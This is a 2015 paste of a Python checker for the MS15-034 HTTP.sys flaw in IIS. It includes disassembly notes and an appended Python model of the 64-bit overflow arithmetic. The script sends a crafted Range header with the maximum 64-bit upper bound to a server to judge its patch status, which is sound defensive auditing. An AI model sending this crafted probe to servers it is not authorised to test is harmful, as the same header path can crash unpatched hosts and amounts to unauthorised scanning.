MS15-034 Checker

a guest Apr 14th, 2015 46,722 Never
r'''
___.                                   .___ __                         __
\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
| __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
| \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |
|___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|
    \/     \/\/                \/      \/                        \/
                                                           MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.
-BF


8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

'''
import socket
import sys

ipAddr = ""  # address of the server to audit; must be set before running
hexAllFfff = "18446744073709551615"  # 2**64 - 1 (0xFFFFFFFFFFFFFFFF) written in decimal

# Plain request used only to read the Server banner.
req1 = b"GET / HTTP/1.0\r\n\r\n"
# Range request whose upper bound is the largest 64-bit value.
req = ("GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n").encode("ascii")

print("[*] Audit Started")
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.sendall(req1)
boringResp = client_socket.recv(1024)
client_socket.close()
if b"Microsoft" not in boringResp:
    print("[*] Not IIS")
    sys.exit(0)

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.sendall(req)
goodResp = client_socket.recv(1024)
client_socket.close()
# Unpatched servers answer the range request with 416; patched ones reject the header.
if b"Requested Range Not Satisfiable" in goodResp:
    print("[!!] Looks VULN")
elif b" The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")
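
The arithmetic the docstring refers to, as an added Python model (not part of the original paste and not Microsoft's code): the sub/sbb pair computes upper minus lower as a 64-bit value, and 1 is then added to get the range length. The function names and the None-means-rejected convention are assumptions made for illustration.

```python
import re

U64_MAX = 2**64 - 1  # 18446744073709551615, the upper bound the checker sends


def unchecked_add(a, b):
    """64-bit addition that silently wraps, like a bare add/adc pair."""
    return (a + b) & U64_MAX


def checked_add(a, b):
    """Model of a checked add in the style of RtlULongLongAdd.

    Returns (ok, result); on overflow ok is False and result is the
    all-ones error value instead of a wrapped sum.
    """
    total = a + b
    if total > U64_MAX:
        return False, U64_MAX
    return True, total


def parse_range(header_value):
    """Parse 'bytes=<lower>-<upper>' into two 64-bit integers."""
    m = re.fullmatch(r"bytes=(\d+)-(\d+)", header_value.strip())
    if not m:
        raise ValueError("unsupported Range syntax")
    lower, upper = int(m.group(1)), int(m.group(2))
    if upper > U64_MAX or lower > upper:
        raise ValueError("bounds out of order or wider than 64 bits")
    return lower, upper


def range_length(header_value, checked):
    """Length of the requested range, or None if the checked add rejects it."""
    lower, upper = parse_range(header_value)
    diff = upper - lower  # the sub eax,edi / sbb ecx,edx step
    if not checked:
        return unchecked_add(diff, 1)  # wraps to 0 for the checker's range
    ok, length = checked_add(diff, 1)  # the add that reports an error
    return length if ok else None


if __name__ == "__main__":
    probe = "bytes=0-18446744073709551615"  # value from the checker's request
    print("unchecked length:", range_length(probe, checked=False))
    print("checked length:  ", range_length(probe, checked=True))
```

With the checked add, the overflow surfaces as an error that the parser can turn into a rejected header, which is the response the script reports as "Looks Patched".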